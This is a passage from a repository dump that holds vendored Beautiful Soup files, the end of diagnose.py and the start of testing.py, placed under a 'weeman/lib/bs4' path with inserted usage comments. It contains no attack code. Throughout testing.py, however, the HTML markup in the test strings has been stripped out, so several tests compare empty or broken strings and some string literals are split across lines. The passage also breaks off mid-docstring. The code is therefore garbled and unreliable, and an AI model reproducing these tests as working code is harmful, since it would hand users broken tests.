55 | "html5lib is not installed or couldn't be imported.")
56 |
57 | if hasattr(data, 'read'):
58 | data = data.read()
59 | elif os.path.exists(data):
60 | print '"%s" looks like a filename. Reading data from the file.' % data
61 | with open(data) as fp:
62 | data = fp.read()
63 | elif data.startswith("http:") or data.startswith("https:"):
64 | print '"%s" looks like a URL. Beautiful Soup is not an HTTP client.' % data
65 | print "You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup."
66 | return
67 | print
68 |
69 | for parser in basic_parsers:
70 | print "Trying to parse your markup with %s" % parser
71 | success = False
72 | try:
73 | soup = BeautifulSoup(data, parser)
74 | success = True
75 | except Exception, e:
76 | print "%s could not parse the markup." % parser
77 | traceback.print_exc()
78 | if success:
79 | print "Here's what %s did with the markup:" % parser
80 | print soup.prettify()
81 |
82 | print "-" * 80
83 |
84 | def lxml_trace(data, html=True, **kwargs):
85 | """Print out the lxml events that occur during parsing.
86 |
87 | This lets you see how lxml parses a document when no Beautiful
88 | Soup code is running.
89 | """
90 | from lxml import etree
91 | for event, element in etree.iterparse(StringIO(data), html=html, **kwargs):
92 | print("%s, %4s, %s" % (event, element.tag, element.text))
93 |
94 | class AnnouncingParser(HTMLParser):
95 | """Announces HTMLParser parse events, without doing anything else."""
96 |
97 | def _p(self, s):
98 | print(s)
99 |
100 | def handle_starttag(self, name, attrs):
101 | self._p("%s START" % name)
102 |
103 | def handle_endtag(self, name):
104 | self._p("%s END" % name)
105 |
106 | def handle_data(self, data):
107 | self._p("%s DATA" % data)
108 |
109 | def handle_charref(self, name):
110 | self._p("%s CHARREF" % name)
111 |
112 | def handle_entityref(self, name):
113 | self._p("%s ENTITYREF" % name)
114 |
115 | def handle_comment(self, data):
116 | self._p("%s COMMENT" % data)
117 |
118 | def handle_decl(self, data):
119 | self._p("%s DECL" % data)
120 |
121 | def unknown_decl(self, data):
122 | self._p("%s UNKNOWN-DECL" % data)
123 |
124 | def handle_pi(self, data):
125 | self._p("%s PI" % data)
126 |
127 | def htmlparser_trace(data):
128 | """Print out the HTMLParser events that occur during parsing.
129 |
130 | This lets you see how HTMLParser parses a document when no
131 | Beautiful Soup code is running.
132 | """
133 | parser = AnnouncingParser()
134 | parser.feed(data)
135 |
136 | _vowels = "aeiou"
137 | _consonants = "bcdfghjklmnpqrstvwxyz"
138 |
139 | def rword(length=5):
140 | "Generate a random word-like string."
141 | s = ''
142 | for i in range(length):
143 | if i % 2 == 0:
144 | t = _consonants
145 | else:
146 | t = _vowels
147 | s += random.choice(t)
148 | return s
149 |
150 | def rsentence(length=4):
151 | "Generate a random sentence-like string."
152 | return " ".join(rword(random.randint(4,9)) for i in range(length))
153 |
154 | def rdoc(num_elements=1000):
155 | """Randomly generate an invalid HTML document."""
156 | tag_names = ['p', 'div', 'span', 'i', 'b', 'script', 'table']
157 | elements = []
158 | for i in range(num_elements):
159 | choice = random.randint(0,3)
160 | if choice == 0:
161 | # New tag.
162 | tag_name = random.choice(tag_names)
163 | elements.append("<%s>" % tag_name)
164 | elif choice == 1:
165 | elements.append(rsentence(random.randint(1,4)))
166 | elif choice == 2:
167 | # Close a tag.
168 | tag_name = random.choice(tag_names)
169 | elements.append("</%s>" % tag_name)
170 | return "<html>" + "\n".join(elements) + "</html>"
171 |
172 | def benchmark_parsers(num_elements=100000):
173 | """Very basic head-to-head performance benchmark."""
174 | print "Comparative parser benchmark on Beautiful Soup %s" % __version__
175 | data = rdoc(num_elements)
176 | print "Generated a large invalid HTML document (%d bytes)." % len(data)
177 |
178 | for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
179 | success = False
180 | try:
181 | a = time.time()
182 | soup = BeautifulSoup(data, parser)
183 | b = time.time()
184 | success = True
185 | except Exception, e:
186 | print "%s could not parse the markup." % parser
187 | traceback.print_exc()
188 | if success:
189 | print "BS4+%s parsed the markup in %.2fs." % (parser, b-a)
190 |
191 | from lxml import etree
192 | a = time.time()
193 | etree.HTML(data)
194 | b = time.time()
195 | print "Raw lxml parsed the markup in %.2fs." % (b-a)
196 |
197 | import html5lib
198 | parser = html5lib.HTMLParser()
199 | a = time.time()
200 | parser.parse(data)
201 | b = time.time()
202 | print "Raw html5lib parsed the markup in %.2fs." % (b-a)
203 |
204 | def profile(num_elements=100000, parser="lxml"):
205 |
206 | filehandle = tempfile.NamedTemporaryFile()
207 | filename = filehandle.name
208 |
209 | data = rdoc(num_elements)
210 | vars = dict(bs4=lib.bs4, data=data, parser=parser)
211 | cProfile.runctx('bs4.BeautifulSoup(data, parser)' , vars, vars, filename)
212 |
213 | stats = pstats.Stats(filename)
214 | # stats.strip_dirs()
215 | stats.sort_stats("cumulative")
216 | stats.print_stats('_html5lib|bs4', 50)
217 |
218 | if __name__ == '__main__':
219 | diagnose(sys.stdin.read())
220 |
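# --- Editor's note: illustrative usage sketch, not part of the vendored file. ---
#
#     from lib.bs4.diagnose import diagnose, benchmark_parsers
#     diagnose("<p>Some markup")  # reports installed parsers and what each produced
#     benchmark_parsers(10000)    # rough relative timings on a random invalid document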
--------------------------------------------------------------------------------
/weeman/lib/bs4/testing.py:
--------------------------------------------------------------------------------
1 | """Helper classes for tests."""
2 |
3 | # Use of this source code is governed by a BSD-style license that can be
4 | # found in the LICENSE file.
5 | __license__ = "MIT"
6 |
7 | import pickle
8 | import copy
9 | import functools
10 | import unittest
11 | from unittest import TestCase
12 | from lib.bs4 import BeautifulSoup
13 | from lib.bs4.element import (
14 | CharsetMetaAttributeValue,
15 | Comment,
16 | ContentMetaAttributeValue,
17 | Doctype,
18 | SoupStrainer,
19 | )
20 |
21 | from lib.bs4.builder import HTMLParserTreeBuilder
22 | default_builder = HTMLParserTreeBuilder
23 |
24 |
25 | class SoupTest(unittest.TestCase):
26 |
27 | @property
28 | def default_builder(self):
29 | return default_builder()
30 |
31 | def soup(self, markup, **kwargs):
32 | """Build a Beautiful Soup object from markup."""
33 | builder = kwargs.pop('builder', self.default_builder)
34 | return BeautifulSoup(markup, builder=builder, **kwargs)
35 |
36 | def document_for(self, markup):
37 | """Turn an HTML fragment into a document.
38 |
39 | The details depend on the builder.
40 | """
41 | return self.default_builder.test_fragment_to_document(markup)
42 |
43 | def assertSoupEquals(self, to_parse, compare_parsed_to=None):
44 | builder = self.default_builder
45 | obj = BeautifulSoup(to_parse, builder=builder)
46 | if compare_parsed_to is None:
47 | compare_parsed_to = to_parse
48 |
49 | self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))
50 |
51 | def assertConnectedness(self, element):
52 | """Ensure that next_element and previous_element are properly
53 | set for all descendants of the given element.
54 | """
55 | earlier = None
56 | for e in element.descendants:
57 | if earlier:
58 | self.assertEqual(e, earlier.next_element)
59 | self.assertEqual(earlier, e.previous_element)
60 | earlier = e
61 |
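# --- Editor's note: illustrative usage sketch, not part of the vendored file. ---
# A concrete test case combines SoupTest's helpers with the smoke-test mixin
# defined just below and picks its builder (the class name here is hypothetical):
#
#     class HTMLParserSmokeTest(SoupTest, HTMLTreeBuilderSmokeTest):
#         @property
#         def default_builder(self):
#             return HTMLParserTreeBuilder()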
62 | class HTMLTreeBuilderSmokeTest(object):
63 |
64 | """A basic test of a treebuilder's competence.
65 |
66 | Any HTML treebuilder, present or future, should be able to pass
67 | these tests. With invalid markup, there's room for interpretation,
68 | and different parsers can handle it differently. But with the
69 | markup in these tests, there's not much room for interpretation.
70 | """
71 |
72 | def test_pickle_and_unpickle_identity(self):
73 | # Pickling a tree, then unpickling it, yields a tree identical
74 | # to the original.
75 | tree = self.soup("foo")
76 | dumped = pickle.dumps(tree, 2)
77 | loaded = pickle.loads(dumped)
78 | self.assertEqual(loaded.__class__, BeautifulSoup)
79 | self.assertEqual(loaded.decode(), tree.decode())
80 |
81 | def assertDoctypeHandled(self, doctype_fragment):
82 | """Assert that a given doctype string is handled correctly."""
83 | doctype_str, soup = self._document_with_doctype(doctype_fragment)
84 |
85 | # Make sure a Doctype object was created.
86 | doctype = soup.contents[0]
87 | self.assertEqual(doctype.__class__, Doctype)
88 | self.assertEqual(doctype, doctype_fragment)
89 | self.assertEqual(str(soup)[:len(doctype_str)], doctype_str)
90 |
91 | # Make sure that the doctype was correctly associated with the
92 | # parse tree and that the rest of the document parsed.
93 | self.assertEqual(soup.p.contents[0], 'foo')
94 |
95 | def _document_with_doctype(self, doctype_fragment):
96 | """Generate and parse a document with the given doctype."""
97 | doctype = '<!DOCTYPE %s>' % doctype_fragment
98 | markup = doctype + '\n<p>foo</p>'
99 | soup = self.soup(markup)
100 | return doctype, soup
101 |
102 | def test_normal_doctypes(self):
103 | """Make sure normal, everyday HTML doctypes are handled correctly."""
104 | self.assertDoctypeHandled("html")
105 | self.assertDoctypeHandled(
106 | 'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"')
107 |
108 | def test_empty_doctype(self):
109 | soup = self.soup("")
110 | doctype = soup.contents[0]
111 | self.assertEqual("", doctype.strip())
112 |
113 | def test_public_doctype_with_url(self):
114 | doctype = 'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"'
115 | self.assertDoctypeHandled(doctype)
116 |
117 | def test_system_doctype(self):
118 | self.assertDoctypeHandled('foo SYSTEM "http://www.example.com/"')
119 |
120 | def test_namespaced_system_doctype(self):
121 | # We can handle a namespaced doctype with a system ID.
122 | self.assertDoctypeHandled('xsl:stylesheet SYSTEM "htmlent.dtd"')
123 |
124 | def test_namespaced_public_doctype(self):
125 | # Test a namespaced doctype with a public id.
126 | self.assertDoctypeHandled('xsl:stylesheet PUBLIC "htmlent.dtd"')
127 |
128 | def test_real_xhtml_document(self):
129 | """A real XHTML document should come out more or less the same as it went in."""
130 | markup = b"""
131 |
132 |
133 | Hello.
134 | Goodbye.
135 | """
136 | soup = self.soup(markup)
137 | self.assertEqual(
138 | soup.encode("utf-8").replace(b"\n", b""),
139 | markup.replace(b"\n", b""))
140 |
141 | def test_processing_instruction(self):
142 | # We test both Unicode and bytestring to verify that
143 | # process_markup correctly sets processing_instruction_class
144 | # even when the markup is already Unicode and there is no
145 | # need to process anything.
146 | markup = u""""""
147 | soup = self.soup(markup)
148 | self.assertEqual(markup, soup.decode())
149 |
150 | markup = b""""""
151 | soup = self.soup(markup)
152 | self.assertEqual(markup, soup.encode("utf8"))
153 |
154 | def test_deepcopy(self):
155 | """Make sure you can copy the tree builder.
156 |
157 | This is important because the builder is part of a
158 | BeautifulSoup object, and we want to be able to copy that.
159 | """
160 | copy.deepcopy(self.default_builder)
161 |
162 | def test_p_tag_is_never_empty_element(self):
163 | """A tag is never designated as an empty-element tag.
164 |
165 | Even if the markup shows it as an empty-element tag, it
166 | shouldn't be presented that way.
167 | """
168 | soup = self.soup("
")
169 | self.assertFalse(soup.p.is_empty_element)
170 | self.assertEqual(str(soup.p), "")
171 |
172 | def test_unclosed_tags_get_closed(self):
173 | """A tag that's not closed by the end of the document should be closed.
174 |
175 | This applies to all tags except empty-element tags.
176 | """
177 | self.assertSoupEquals("", "
")
178 | self.assertSoupEquals("", "")
179 |
180 | self.assertSoupEquals("
", "
")
181 |
182 | def test_br_is_always_empty_element_tag(self):
183 | """A
tag is designated as an empty-element tag.
184 |
185 | Some parsers treat
as one
tag, some parsers as
186 | two tags, but it should always be an empty-element tag.
187 | """
188 | soup = self.soup("
")
189 | self.assertTrue(soup.br.is_empty_element)
190 | self.assertEqual(str(soup.br), "
")
191 |
192 | def test_nested_formatting_elements(self):
193 | self.assertSoupEquals("")
194 |
195 | def test_double_head(self):
196 | html = '''<!DOCTYPE html>
197 | <html>
198 | <head>
199 | <title>Ordinary HEAD element test</title>
200 | </head>
201 | <script type="text/javascript">
202 | alert("Help!")
203 | </script>
204 | <body>
205 | Hello, world!
206 | </body>
207 | </html>
208 | '''
209 | soup = self.soup(html)
210 | self.assertEqual("text/javascript", soup.find('script')['type'])
211 |
212 | def test_comment(self):
213 | # Comments are represented as Comment objects.
214 | markup = "foobaz
"
215 | self.assertSoupEquals(markup)
216 |
217 | soup = self.soup(markup)
218 | comment = soup.find(text="foobar")
219 | self.assertEqual(comment.__class__, Comment)
220 |
221 | # The comment is properly integrated into the tree.
222 | foo = soup.find(text="foo")
223 | self.assertEqual(comment, foo.next_element)
224 | baz = soup.find(text="baz")
225 | self.assertEqual(comment, baz.previous_element)
226 |
227 | def test_preserved_whitespace_in_pre_and_textarea(self):
228 | """Whitespace must be preserved in and